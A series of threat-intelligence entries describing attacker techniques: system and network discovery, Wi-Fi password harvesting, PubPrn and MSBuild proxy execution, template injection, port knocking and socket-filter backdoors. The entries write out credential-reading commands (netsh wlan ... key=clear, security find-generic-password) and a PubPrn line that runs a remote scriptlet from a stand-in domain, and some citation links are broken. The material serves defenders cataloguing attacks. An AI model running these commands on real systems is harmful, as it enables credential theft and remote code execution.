For example, on a Windows system adversaries may attempt to infer the language of a system by querying the registry key <code>HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Nls\Language</code> or parsing the outputs of Windows API functions <code>GetUserDefaultUILanguage</code>, <code>GetSystemDefaultUILanguage</code>, <code>GetKeyboardLayoutList</code> and <code>GetUserDefaultLangID</code>.<sup>[[Darkside Ransomware Cybereason](https://app.tidalcyber.com/references/eded380e-33e9-4fdc-8e1f-b51d650b9731)]</sup><sup>[[Securelist JSWorm](https://app.tidalcyber.com/references/c29ca9f2-1e48-4913-b10b-15e558868ed8)]</sup><sup>[[SecureList SynAck Doppelgänging May 2018](https://app.tidalcyber.com/references/d9f0af0f-8a65-406b-9d7e-4051086ef301)]</sup>

On a macOS or Linux system, adversaries may query <code>locale</code> to retrieve the value of the <code>$LANG</code> environment variable.

The tag is: misp-galaxy:technique="System Language Discovery"

System Location Discovery

Adversaries may gather information in an attempt to calculate the geographical location of a victim host. Adversaries may use the information from [System Location Discovery](https://app.tidalcyber.com/technique/90e6a093-3e87-4d74-8b68-38c7d7e5e93c) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.

Adversaries may attempt to infer the location of a system using various system checks, such as time zone, keyboard layout, and/or language settings.<sup>[[FBI Ragnar Locker 2020](https://app.tidalcyber.com/references/38b9b8a3-6fd3-4650-9192-14ee3f302705)]</sup><sup>[[Sophos Geolocation 2016](https://app.tidalcyber.com/references/a3b7540d-20cc-4d94-8321-9fd730486f8c)]</sup><sup>[[Bleepingcomputer RAT malware 2020](https://app.tidalcyber.com/references/a587ea99-a951-4aa8-a3cf-a4822ae97490)]</sup> Windows API functions such as <code>GetLocaleInfoW</code> can also be used to determine the locale of the host.<sup>[[FBI Ragnar Locker 2020](https://app.tidalcyber.com/references/38b9b8a3-6fd3-4650-9192-14ee3f302705)]</sup> In cloud environments, an instance’s availability zone may also be discovered by accessing the instance metadata service from the instance.<sup>[[AWS Instance Identity Documents](https://app.tidalcyber.com/references/efff0080-59fc-4ba7-ac91-771358f68405)]</sup><sup>[[Microsoft Azure Instance Metadata 2021](https://app.tidalcyber.com/references/66e93b75-0067-4cdb-b695-8f8109ef26e0)]</sup>

Adversaries may also attempt to infer the location of a victim host using IP addressing, such as via online geolocation IP-lookup services.<sup>[[Securelist Trasparent Tribe 2020](https://app.tidalcyber.com/references/0db470b1-ab22-4b67-a858-472e4de7c6f0)]</sup><sup>[[Sophos Geolocation 2016](https://app.tidalcyber.com/references/a3b7540d-20cc-4d94-8321-9fd730486f8c)]</sup>

The tag is: misp-galaxy:technique="System Location Discovery"

Internet Connection Discovery

Adversaries may check for Internet connectivity on compromised systems. This may be performed during automated discovery and can be accomplished in numerous ways such as using [Ping](https://app.tidalcyber.com/software/4ea12106-c0a1-4546-bb64-a1675d9f5dc7), <code>tracert</code>, and GET requests to websites.

Adversaries may use the results and responses from these requests to determine if the system is capable of communicating with their C2 servers before attempting to connect to them. The results may also be used to identify routes, redirectors, and proxy servers.

The tag is: misp-galaxy:technique="Internet Connection Discovery"

Wi-Fi Discovery

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems. Adversaries may use Wi-Fi information as part of [Account Discovery](https://app.tidalcyber.com/technique/6736995e-b9ea-401b-81fa-6caeb7a17ce3), [Remote System Discovery](https://app.tidalcyber.com/technique/00a9a4d4-928d-4d95-be31-dfac6103991f), and other discovery or [Credential Access](https://app.tidalcyber.com/tactics/0c3132d5-c0df-4793-b5f2-1a95bd64ab53) activity to support both ongoing and future campaigns.

Adversaries may collect various types of information about Wi-Fi networks from hosts. For example, on Windows names and passwords of all Wi-Fi networks a device has previously connected to may be available through netsh wlan show profiles to enumerate Wi-Fi names and then netsh wlan show profile “Wi-Fi name” key=clear to show a Wi-Fi network’s corresponding password.<sup>[[BleepingComputer Agent Tesla steal wifi passwords](https://app.tidalcyber.com/references/93b5ecd2-35a3-5bd8-9d6e-87bace012546)]</sup><sup>[[Malware Bytes New AgentTesla variant steals WiFi credentials](https://app.tidalcyber.com/references/b61b7db6-ed0d-546d-b1e0-c2630530975b)]</sup><sup>[[Check Point APT35 CharmPower January 2022](https://app.tidalcyber.com/references/81dce660-93ea-42a4-902f-0c6021d30f59)]</sup> Additionally, names and other details of locally reachable Wi-Fi networks can be discovered using calls to wlanAPI.dll [Native API](https://app.tidalcyber.com/technique/1120f5ec-ef1b-4596-8d8b-a3979a766560) functions.<sup>[[Binary Defense Emotes Wi-Fi Spreader](https://app.tidalcyber.com/references/05e624ee-c53d-5cd1-8fd2-6b2d38344bfd)]</sup>

On Linux, names and passwords of all Wi-Fi-networks a device has previously connected to may be available in files under ` /etc/NetworkManager/system-connections/.<sup>[[Wi-Fi Password of All Connected Networks in Windows/Linux](https://app.tidalcyber.com/references/7005f62f-0239-56c7-964b-64384e17b8da)]</sup> On macOS, the password of a known Wi-Fi may be identified with ` security find-generic-password -wa wifiname (requires admin username/password).<sup>[[Find Wi-Fi Password on Mac](https://app.tidalcyber.com/references/695f3d20-7a46-5a4a-aef0-0a05a5e35304)]</sup>

The tag is: misp-galaxy:technique="Wi-Fi Discovery"

System Network Configuration Discovery

Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include [Arp](https://app.tidalcyber.com/software/45b51950-6190-4572-b1a2-7c69d865251e), [ipconfig](ifconfig(https://app.tidalcyber.com/software/93ab16d1-625e-4b1c-bb28-28974c269c47), [nbtstat](https://app.tidalcyber.com/software/81c2fc9b-8c2c-40f6-a327-dcdd64b70a7e), and [route](https://app.tidalcyber.com/software/3b755518-9085-474e-8bc4-4f9344d9c8af).

Adversaries may also leverage a [Network Device CLI](https://app.tidalcyber.com/technique/284bfbb3-99f0-4c3d-bc1f-ab74065b7907) on network devices to gather information about configurations and settings, such as IP addresses of configured interfaces and static/dynamic routes (e.g. <code>show ip route</code>, <code>show ip interface</code>).<sup>[[US-CERT-TA18-106A](https://app.tidalcyber.com/references/1fe55557-94af-4697-a675-884701f70f2a)]</sup><sup>[[Mandiant APT41 Global Intrusion ](https://app.tidalcyber.com/references/9b75a38e-e5c7-43c8-a7fb-c7f212e00497)]</sup>

Adversaries may use the information from [System Network Configuration Discovery](https://app.tidalcyber.com/technique/adb6b8c1-2bdb-42b9-95da-5ce07e8796f7) during automated discovery to shape follow-on behaviors, including determining certain access within the target network and what actions to do next.

The tag is: misp-galaxy:technique="System Network Configuration Discovery"

System Network Connections Discovery

Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network.

An adversary who gains access to a system that is part of a cloud-based environment may map out Virtual Private Clouds or Virtual Networks in order to determine what systems and services are connected. The actions performed are likely the same types of discovery techniques depending on the operating system, but the resulting information may include details about the networked cloud environment relevant to the adversary’s goals. Cloud providers may have different ways in which their virtual networks operate.<sup>[[Amazon AWS VPC Guide](https://app.tidalcyber.com/references/7972332d-fbe9-4f14-9511-4298f65f2a86)]</sup><sup>[[Microsoft Azure Virtual Network Overview](https://app.tidalcyber.com/references/bf7f2e7a-f5ae-4b6e-8c90-fd41a92c4615)]</sup><sup>[[Google VPC Overview](https://app.tidalcyber.com/references/9ebe53cf-657f-475d-85e4-9e30f4af1e7d)]</sup> Similarly, adversaries who gain access to network devices may also perform similar discovery activities to gather information about connected systems and services.

Utilities and commands that acquire this information include [netstat](https://app.tidalcyber.com/software/132fb908-9f13-4bcf-aa64-74cbc72f5491), "net use," and "net session" with [Net](https://app.tidalcyber.com/software/c9b8522f-126d-40ff-b44e-1f46098bd8cc). In Mac and Linux, [netstat](https://app.tidalcyber.com/software/132fb908-9f13-4bcf-aa64-74cbc72f5491) and <code>lsof</code> can be used to list current connections. <code>who -a</code> and <code>w</code> can be used to show which users are currently logged in, similar to "net session". Additionally, built-in features native to network devices and [Network Device CLI](https://app.tidalcyber.com/technique/284bfbb3-99f0-4c3d-bc1f-ab74065b7907) may be used (e.g. <code>show ip sockets</code>, <code>show tcp brief</code>).<sup>[[US-CERT-TA18-106A](https://app.tidalcyber.com/references/1fe55557-94af-4697-a675-884701f70f2a)]</sup>

The tag is: misp-galaxy:technique="System Network Connections Discovery"

System Owner/User Discovery

Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using [OS Credential Dumping](https://app.tidalcyber.com/technique/368f85f9-2b15-4732-80fe-087694eaf34d). The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://app.tidalcyber.com/technique/86e6f1f0-290b-4971-b50e-80e98a0a768b) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.

Various utilities and commands may acquire this information, including <code>whoami</code>. In macOS and Linux, the currently logged in user can be identified with <code>w</code> and <code>who</code>. On macOS the <code>dscl . list /Users | grep -v '_'</code> command can also be used to enumerate user accounts. Environment variables, such as <code>%USERNAME%</code> and <code>$USER</code>, may also be used to access this information.

On network devices, [Network Device CLI](https://app.tidalcyber.com/technique/284bfbb3-99f0-4c3d-bc1f-ab74065b7907) commands such as show users and show ssh can be used to display users currently logged into the device.<sup>[[show_ssh_users_cmd_cisco](https://app.tidalcyber.com/references/11d34884-4559-57ad-8910-54e517c6493e)]</sup><sup>[[US-CERT TA18-106A Network Infrastructure Devices 2018](https://app.tidalcyber.com/references/8fdf280d-680f-4b8f-8fb9-6b3118ec3983)]</sup>

The tag is: misp-galaxy:technique="System Owner/User Discovery"

PubPrn

Adversaries may use PubPrn to proxy execution of malicious remote files. PubPrn.vbs is a [Visual Basic](https://app.tidalcyber.com/technique/0340ed34-6db2-4979-bf73-2c16855867b4) script that publishes a printer to Active Directory Domain Services. The script may be signed by Microsoft and is commonly executed through the [Windows Command Shell](https://app.tidalcyber.com/technique/be095bcc-4769-4010-b2db-3033d01efdbe) via <code>Cscript.exe</code>. For example, the following code publishes a printer within the specified domain: <code>cscript pubprn Printer1 LDAP://CN=Container1,DC=Domain1,DC=Com</code>.<sup>[[pubprn](https://app.tidalcyber.com/references/c845c67a-20ab-405c-95fe-2f667f83b886)]</sup>

Adversaries may abuse PubPrn to execute malicious payloads hosted on remote sites.<sup>[[Enigma0x3 PubPrn Bypass](https://app.tidalcyber.com/references/8b12e87b-3836-4c79-877b-0a2761b34533)]</sup> To do so, adversaries may set the second <code>script:</code> parameter to reference a scriptlet file (.sct) hosted on a remote site. An example command is <code>pubprn.vbs 127.0.0.1 script:https://mydomain.com/folder/file.sct</code>. This behavior may bypass signature validation restrictions and application control solutions that do not account for abuse of this script.

In later versions of Windows (10+), <code>PubPrn.vbs</code> has been updated to prevent proxying execution from a remote site. This is done by limiting the protocol specified in the second parameter to <code>LDAP://</code>, vice the <code>script:</code> moniker which could be used to reference remote code via HTTP(S).

The tag is: misp-galaxy:technique="PubPrn"

System Script Proxy Execution

Adversaries may use trusted scripts, often signed with certificates, to proxy the execution of malicious files. Several Microsoft signed scripts that have been downloaded from Microsoft or are default on Windows installations can be used to proxy execution of other files.<sup>[[LOLBAS Project](https://app.tidalcyber.com/references/14b1d3ab-8508-4946-9913-17e667956064)]</sup> This behavior may be abused by adversaries to execute malicious files that could bypass application control and signature validation on systems.<sup>[[GitHub Ultimate AppLocker Bypass List](https://app.tidalcyber.com/references/a2fa7fb8-ddba-44cf-878f-448fb2aa6149)]</sup>

The tag is: misp-galaxy:technique="System Script Proxy Execution"

System Service Discovery

Adversaries may try to gather information about registered local system services. Adversaries may obtain information about services using tools as well as OS utility commands such as <code>sc query</code>, <code>tasklist /svc</code>, <code>systemctl --type=service</code>, and <code>net start</code>.

Adversaries may use the information from [System Service Discovery](https://app.tidalcyber.com/technique/e0a347e2-2ac5-458b-ab0f-18d81b6d6055) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.

The tag is: misp-galaxy:technique="System Service Discovery"

Launchctl

Adversaries may abuse launchctl to execute commands or programs. Launchctl interfaces with launchd, the service management framework for macOS. Launchctl supports taking subcommands on the command-line, interactively, or even redirected from standard input.<sup>[[Launchctl Man](https://app.tidalcyber.com/references/26bd50ba-c359-4804-b574-7ec731b37fa6)]</sup>

Adversaries use launchctl to execute commands and programs as [Launch Agent](https://app.tidalcyber.com/technique/6dbe030c-5f87-4b45-9b6b-5bba2c0fad00)s or [Launch Daemon](https://app.tidalcyber.com/technique/eff618a9-6498-4b01-bca1-cd5f3784fc27)s. Common subcommands include: <code>launchctl load</code>,<code>launchctl unload</code>, and <code>launchctl start</code>. Adversaries can use scripts or manually run the commands <code>launchctl load -w "%s/Library/LaunchAgents/%s"</code> or <code>/bin/launchctl load</code> to execute [Launch Agent](https://app.tidalcyber.com/technique/6dbe030c-5f87-4b45-9b6b-5bba2c0fad00)s or [Launch Daemon]([Sofacy Komplex Trojan(https://app.tidalcyber.com/references/a21be45e-26c3-446d-b336-b58d08df5749)]</sup><sup>[[20 macOS Common Tools and Techniques](https://app.tidalcyber.com/references/3ee99ff4-daf4-4776-9d94-f7cf193c2b0c)]</sup>

The tag is: misp-galaxy:technique="Launchctl"

Service Execution

Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager (<code>services.exe</code>) is an interface to manage and manipulate services.<sup>[[Microsoft Service Control Manager](https://app.tidalcyber.com/references/00d22c6d-a51a-4107-bf75-53ec3330db92)]</sup> The service control manager is accessible to users via GUI components as well as system utilities such as <code>sc.exe</code> and [Net](https://app.tidalcyber.com/software/c9b8522f-126d-40ff-b44e-1f46098bd8cc).

[PsExec](https://app.tidalcyber.com/software/73eb32af-4bd3-4e21-8048-355edc55a9c6) can also be used to execute commands or payloads via a temporary Windows service created through the service control manager API.<sup>[[Russinovich Sysinternals](https://app.tidalcyber.com/references/72d27aca-62c5-4e96-9977-c41951aaa888)]</sup> Tools such as [PsExec](https://app.tidalcyber.com/software/73eb32af-4bd3-4e21-8048-355edc55a9c6) and <code>sc.exe</code> can accept remote servers as arguments and may be used to conduct remote execution.

Adversaries may leverage these mechanisms to execute malicious content. This can be done by either executing a new or modified service. This technique is the execution used in conjunction with [Windows Service](https://app.tidalcyber.com/technique/31c6dd3c-3eb2-46a9-ab85-9e8e145810a1) during service persistence or privilege escalation.

The tag is: misp-galaxy:technique="Service Execution"

System Services

Adversaries may abuse system services or daemons to execute commands or programs. Adversaries can execute malicious content by interacting with or creating services either locally or remotely. Many services are set to run at boot, which can aid in achieving persistence ([Create or Modify System Process](https://app.tidalcyber.com/technique/f8aa018b-5134-4201-87f2-e55d20f40b17)), but adversaries can also abuse services for one-time or temporary execution.

The tag is: misp-galaxy:technique="System Services"

System Shutdown/Reboot

Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via [Network Device CLI](https://app.tidalcyber.com/technique/284bfbb3-99f0-4c3d-bc1f-ab74065b7907) (e.g. <code>reload</code>).<sup>[[Microsoft Shutdown Oct 2017](https://app.tidalcyber.com/references/c587f021-596a-4e63-ac51-afa2793a859d)]</sup><sup>[[alert_TA18_106A](https://app.tidalcyber.com/references/26b520dc-5c68-40f4-82fb-366d27fc0c2f)]</sup>

Shutting down or rebooting systems may disrupt access to computer resources for legitimate users while also impeding incident response/recovery.

Adversaries may attempt to shutdown/reboot a system after impacting it in other ways, such as [Disk Structure Wipe](https://app.tidalcyber.com/technique/14a944d3-ab95-40d8-b069-ccc4824ef46d) or [Inhibit System Recovery](https://app.tidalcyber.com/technique/d207c03b-fbe7-420e-a053-339f4650c043), to hasten the intended effects on system availability.<sup>[[Talos Nyetya June 2017](https://app.tidalcyber.com/references/c76e806c-b0e3-4ab9-ba6d-68a9f731f127)]</sup><sup>[[Talos Olympic Destroyer 2018](https://app.tidalcyber.com/references/25a2e179-7abd-4091-8af4-e9d2bf24ef11)]</sup>

The tag is: misp-galaxy:technique="System Shutdown/Reboot"

System Time Discovery

An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network. <sup>[[MSDN System Time](https://app.tidalcyber.com/references/5e15e03b-be8b-4f3d-a3ae-0df7a4ecfbec)]</sup><sup>[[Technet Windows Time Service](https://app.tidalcyber.com/references/0d908e07-abc1-40fc-b147-9b9fd483b262)]</sup>

System time information may be gathered in a number of ways, such as with [Net](https://app.tidalcyber.com/software/c9b8522f-126d-40ff-b44e-1f46098bd8cc) on Windows by performing <code>net time \\hostname</code> to gather the system time on a remote system. The victim’s time zone may also be inferred from the current system time or gathered by using <code>w32tm /tz</code>.<sup>[[Technet Windows Time Service](https://app.tidalcyber.com/references/0d908e07-abc1-40fc-b147-9b9fd483b262)]</sup>

On network devices, [Network Device CLI](https://app.tidalcyber.com/technique/284bfbb3-99f0-4c3d-bc1f-ab74065b7907) commands such as show clock detail can be used to see the current time configuration.<sup>[[show_clock_detail_cisco_cmd](https://app.tidalcyber.com/references/a2215813-31b0-5624-92d8-479e7bd1a30b)]</sup>

This information could be useful for performing other techniques, such as executing a file with a [Scheduled Task/Job]([RSA EU12 They’re Inside(https://app.tidalcyber.com/references/8330ab88-9c73-4332-97d6-c1fb95b1a155)]</sup>, or to discover locality information based on time zone to assist in victim targeting (i.e. [System Location Discovery](https://app.tidalcyber.com/technique/90e6a093-3e87-4d74-8b68-38c7d7e5e93c)). Adversaries may also use knowledge of system time as part of a time bomb, or delaying execution until a specified date/time.<sup>[[AnyRun TimeBomb](https://app.tidalcyber.com/references/cd369bf9-80a8-426f-a0aa-c9745b40696c)]</sup>

The tag is: misp-galaxy:technique="System Time Discovery"

Taint Shared Content

Adversaries may deliver payloads to remote systems by adding content to shared storage locations, such as network drives or internal code repositories. Content stored on network drives or in other shared locations may be tainted by adding malicious programs, scripts, or exploit code to otherwise valid files. Once a user opens the shared tainted content, the malicious portion can be executed to run the adversary’s code on a remote system. Adversaries may use tainted shared content to move laterally.

A directory share pivot is a variation on this technique that uses several other techniques to propagate malware when users access a shared network directory. It uses [Shortcut Modification](https://app.tidalcyber.com/technique/bfde0a09-8109-41e4-b8c9-68fe20e8131b) of directory .LNK files that use [Masquerading](https://app.tidalcyber.com/technique/a0adacc1-8d2a-4e0b-92c1-3766264df4fd) to look like the real directories, which are hidden through [Hidden Files and Directories](https://app.tidalcyber.com/technique/14e81a2d-9eca-429c-9fb9-08e109de9f6c). The malicious .LNK-based directories have an embedded command that executes the hidden malware file in the directory and then opens the real intended directory so that the user’s expected action still occurs. When used with frequently used network directories, the technique may result in frequent reinfections and broad access to systems and potentially to new and higher privileged accounts. <sup>[[Retwin Directory Share Pivot](https://app.tidalcyber.com/references/027c5274-6b61-447a-9058-edb844f112dd)]</sup>

Adversaries may also compromise shared network directories through binary infections by appending or prepending its code to the healthy binary on the shared network directory. The malware may modify the original entry point (OEP) of the healthy binary to ensure that it is executed before the legitimate code. The infection could continue to spread via the newly infected file when it is executed by a remote system. These infections may target both binary and non-binary formats that end with extensions including, but not limited to, .EXE, .DLL, .SCR, .BAT, and/or .VBS.

The tag is: misp-galaxy:technique="Taint Shared Content"

Template Injection

Adversaries may create or modify references in user document templates to conceal malicious code or force authentication attempts. For example, Microsoft’s Office Open XML (OOXML) specification defines an XML-based format for Office documents (.docx, xlsx, .pptx) to replace older binary formats (.doc, .xls, .ppt). OOXML files are packed together ZIP archives compromised of various XML files, referred to as parts, containing properties that collectively define how a document is rendered.<sup>[[Microsoft Open XML July 2017](https://app.tidalcyber.com/references/8145f894-6477-4629-81de-1dd26070ee0a)]</sup>

Properties within parts may reference shared public resources accessed via online URLs. For example, template properties may reference a file, serving as a pre-formatted document blueprint, that is fetched when the document is loaded.

Adversaries may abuse these templates to initially conceal malicious code to be executed via user documents. Template references injected into a document may enable malicious payloads to be fetched and executed when the document is loaded.<sup>[[SANS Brian Wiltse Template Injection](https://app.tidalcyber.com/references/8c010c87-865b-4168-87a7-4a24db413def)]</sup> These documents can be delivered via other techniques such as [Phishing](https://app.tidalcyber.com/technique/d4a36624-50cb-43d3-95af-a2e10878a533) and/or [Taint Shared Content](https://app.tidalcyber.com/technique/58987d0d-2ebf-4783-90ac-5164fe9b9e43) and may evade static detections since no typical indicators (VBA macro, script, etc.) are present until after the malicious payload is fetched.<sup>[[Redxorblue Remote Template Injection](https://app.tidalcyber.com/references/bce1cd78-b55e-40cf-8a90-64240db867ac)]</sup> Examples have been seen in the wild where template injection was used to load malicious code containing an exploit.<sup>[[MalwareBytes Template Injection OCT 2017](https://app.tidalcyber.com/references/7ef0ab1f-c7d6-46fe-b489-fab4db623e0a)]</sup>

Adversaries may also modify the <code>*\template</code> control word within an .rtf file to similarly conceal then download malicious code. This legitimate control word value is intended to be a file destination of a template file resource that is retrieved and loaded when an .rtf file is opened. However, adversaries may alter the bytes of an existing .rtf file to insert a template control word field to include a URL resource of a malicious payload.<sup>[[Proofpoint RTF Injection](https://app.tidalcyber.com/references/8deb6edb-293f-4b9d-882a-541675864eb5)]</sup><sup>[[Ciberseguridad Decoding malicious RTF files](https://app.tidalcyber.com/references/82d2451b-300f-4891-b1e7-ade53dff1126)]</sup>

This technique may also enable [Forced Authentication](https://app.tidalcyber.com/technique/e732e1d4-fffa-4fc3-b387-47782c821688) by injecting a SMB/HTTPS (or other credential prompting) URL and triggering an authentication attempt.<sup>[[Anomali Template Injection MAR 2018](https://app.tidalcyber.com/references/3cdeb2a2-9582-4725-a132-6503dbe04e1d)]</sup><sup>[[Talos Template Injection July 2017](https://app.tidalcyber.com/references/175ea537-2a94-42c7-a83b-bec8906ee6b9)]</sup><sup>[[ryhanson phishery SEPT 2016](https://app.tidalcyber.com/references/7e643cf0-5df7-455d-add7-2342f36bdbcb)]</sup>

The tag is: misp-galaxy:technique="Template Injection"

Port Knocking

Adversaries may use port knocking to hide open ports used for persistence or command and control. To enable a port, an adversary sends a series of attempted connections to a predefined sequence of closed ports. After the sequence is completed, opening a port is often accomplished by the host based firewall, but could also be implemented by custom software.

This technique has been observed both for the dynamic opening of a listening port as well as the initiating of a connection to a listening server on a different system.

The observation of the signal packets to trigger the communication can be conducted through different methods. One means, originally implemented by Cd00r <sup>[[Hartrell cd00r 2002](https://app.tidalcyber.com/references/739e6517-10f5-484d-8000-8818d63e7341)]</sup>, is to use the libpcap libraries to sniff for the packets in question. Another method leverages raw sockets, which enables the malware to use ports that are already open for use by other programs.

The tag is: misp-galaxy:technique="Port Knocking"

Socket Filters

Adversaries may attach filters to a network socket to monitor then activate backdoors used for persistence or command and control. With elevated permissions, adversaries can use features such as the libpcap library to open sockets and install filters to allow or disallow certain types of data to come through the socket. The filter may apply to all traffic passing through the specified network interface (or every interface if not specified). When the network interface receives a packet matching the filter criteria, additional actions can be triggered on the host, such as activation of a reverse shell.

To establish a connection, an adversary sends a crafted packet to the targeted host that matches the installed filter criteria.<sup>[[haking9 libpcap network sniffing](https://app.tidalcyber.com/references/2803d0b8-78ee-4b19-aad3-daf84cd292b5)]</sup> Adversaries have used these socket filters to trigger the installation of implants, conduct ping backs, and to invoke command shells. Communication with these socket filters may also be used in conjunction with [Protocol Tunneling]([exatrack bpf filters passive backdoors(https://app.tidalcyber.com/references/84ffd130-97b9-4bbf-bc3e-42accdf248ce)]</sup><sup>[[Leonardo Turla Penquin May 2020](https://app.tidalcyber.com/references/09d8bb54-6fa5-4842-98aa-6e9656a19092)]</sup>

Filters can be installed on any Unix-like platform with libpcap installed or on Windows hosts using Winpcap. Adversaries may use either libpcap with pcap_setfilter or the standard library function setsockopt with SO_ATTACH_FILTER options. Since the socket connection is not active until the packet is received, this behavior may be difficult to detect due to the lack of activity on a host, low CPU overhead, and limited visibility into raw socket usage.

The tag is: misp-galaxy:technique="Socket Filters"

Traffic Signaling

Adversaries may use traffic signaling to hide open ports or other malicious functionality used for persistence or command and control. Traffic signaling involves the use of a magic value or sequence that must be sent to a system to trigger a special response, such as opening a closed port or executing a malicious task. This may take the form of sending a series of packets with certain characteristics before a port will be opened that the adversary can use for command and control. Usually this series of packets consists of attempted connections to a predefined sequence of closed ports (i.e. [Port Knocking](https://app.tidalcyber.com/technique/34a112db-c61d-4ea2-872f-de3fc1af87a3)), but can involve unusual flags, specific strings, or other unique characteristics. After the sequence is completed, opening a port may be accomplished by the host-based firewall, but could also be implemented by custom software.

Adversaries may also communicate with an already open port, but the service listening on that port will only respond to commands or trigger other malicious functionality if passed the appropriate magic value(s).

The observation of the signal packets to trigger the communication can be conducted through different methods. One means, originally implemented by Cd00r <sup>[[Hartrell cd00r 2002](https://app.tidalcyber.com/references/739e6517-10f5-484d-8000-8818d63e7341)]</sup>, is to use the libpcap libraries to sniff for the packets in question. Another method leverages raw sockets, which enables the malware to use ports that are already open for use by other programs.

On network devices, adversaries may use crafted packets to enable [Network Device Authentication](https://app.tidalcyber.com/technique/195aa08b-15fd-4019-b905-8f31bc5e2094) for standard services offered by the device such as telnet. Such signaling may also be used to open a closed service port such as telnet, or to trigger module modification of malware implants on the device, adding, removing, or changing malicious capabilities. Adversaries may use crafted packets to attempt to connect to one or more (open or closed) ports, but may also attempt to connect to a router interface, broadcast, and network address IP on the same port in order to achieve their goals and objectives.<sup>[[Cisco Synful Knock Evolution](https://app.tidalcyber.com/references/29301297-8343-4f75-8096-7fe229812f75)]</sup><sup>[[Mandiant - Synful Knock](https://app.tidalcyber.com/references/1f6eaa98-9184-4341-8634-5512a9c632dd)]</sup><sup>[[Cisco Blog Legacy Device Attacks](https://app.tidalcyber.com/references/f7ce5099-7e04-4c0b-8767-e0eec664b18e)]</sup> To enable this traffic signaling on embedded devices, adversaries must first achieve and leverage [Patch System Image](https://app.tidalcyber.com/technique/630a17c1-0176-4764-8f5c-a83f4f3e980f) due to the monolithic nature of the architecture.

Adversaries may also use the Wake-on-LAN feature to turn on powered off systems. Wake-on-LAN is a hardware feature that allows a powered down system to be powered on, or woken up, by sending a magic packet to it. Once the system is powered on, it may become a target for lateral movement.<sup>[[Bleeping Computer - Ryuk WoL](https://app.tidalcyber.com/references/f6670b73-4d57-4aad-8264-1d42d585e280)]</sup><sup>[[AMD Magic Packet](https://app.tidalcyber.com/references/06d36dea-e13d-48c4-b6d6-0c175c379f5b)]</sup>

The tag is: misp-galaxy:technique="Traffic Signaling"

Transfer Data to Cloud Account

Adversaries may exfiltrate data by transferring the data, including backups of cloud environments, to another cloud account they control on the same service to avoid typical file transfers/downloads and network-based exfiltration detection.

A defender who is monitoring for large transfers to outside the cloud environment through normal file transfers or over command and control channels may not be watching for data transfers to another account within the same cloud provider. Such transfers may utilize existing cloud provider APIs and the internal address space of the cloud provider to blend into normal traffic or avoid data transfers over external network interfaces.

Incidents have been observed where adversaries have created backups of cloud instances and transferred them to separate accounts.<sup>[[DOJ GRU Indictment Jul 2018](https://app.tidalcyber.com/references/d65f371b-19d0-49de-b92b-94a2bea1d988)]</sup>

The tag is: misp-galaxy:technique="Transfer Data to Cloud Account"

MSBuild

Adversaries may use MSBuild to proxy execution of code through a trusted Windows utility. MSBuild.exe (Microsoft Build Engine) is a software build platform used by Visual Studio. It handles XML formatted project files that define requirements for loading and building various platforms and configurations.<sup>[[MSDN MSBuild](https://app.tidalcyber.com/references/9ad54187-84b0-47f9-af6e-c3753452e470)]</sup>

Adversaries can abuse MSBuild to proxy execution of malicious code. The inline task capability of MSBuild that was introduced in .NET version 4 allows for C# or Visual Basic code to be inserted into an XML project file.<sup>[[MSDN MSBuild](https://app.tidalcyber.com/references/9ad54187-84b0-47f9-af6e-c3753452e470)]</sup><sup>[[Microsoft MSBuild Inline Tasks 2017](https://app.tidalcyber.com/references/2c638ca5-c7e2-4c4e-bb9c-e36d14899ca8)]</sup> MSBuild will compile and execute the inline task. MSBuild.exe is a signed Microsoft binary, so when it is used this way it can execute arbitrary code and bypass application control defenses that are configured to allow MSBuild.exe execution.<sup>[[LOLBAS Msbuild](https://app.tidalcyber.com/references/de8e0741-255b-4c41-ba50-248ac5acc325)]</sup>

The tag is: misp-galaxy:technique="MSBuild"

Trusted Developer Utilities Proxy Execution

Adversaries may take advantage of trusted developer utilities to proxy execution of malicious payloads. There are many utilities used for software development related tasks that can be used to execute code in various forms to assist in development, debugging, and reverse engineering.<sup>[[engima0x3 DNX Bypass](https://app.tidalcyber.com/references/e0186f1d-100d-4e52-b6f7-0a7e1c1a35f0)]</sup><sup>[[engima0x3 RCSI Bypass](https://app.tidalcyber.com/references/0b815bd9-6c7f-4bd8-9031-667fa6252f89)]</sup><sup>[[Exploit Monday WinDbg](https://app.tidalcyber.com/references/abd5f871-e12e-4355-af72-d4be79cb0291)]</sup><sup>[[LOLBAS Tracker](https://app.tidalcyber.com/references/f0e368f1-3347-41ef-91fb-995c3cb07707)]</sup> These utilities may often be signed with legitimate certificates that allow them to execute on a system and proxy execution of malicious code through a trusted process that effectively bypasses application control solutions.

The tag is: misp-galaxy:technique="Trusted Developer Utilities Proxy Execution"

Trusted Relationship

Adversaries may breach or otherwise leverage organizations who have access to intended victims. Access through trusted third party relationship abuses an existing connection that may not be protected or receives less scrutiny than standard mechanisms of gaining access to a network.

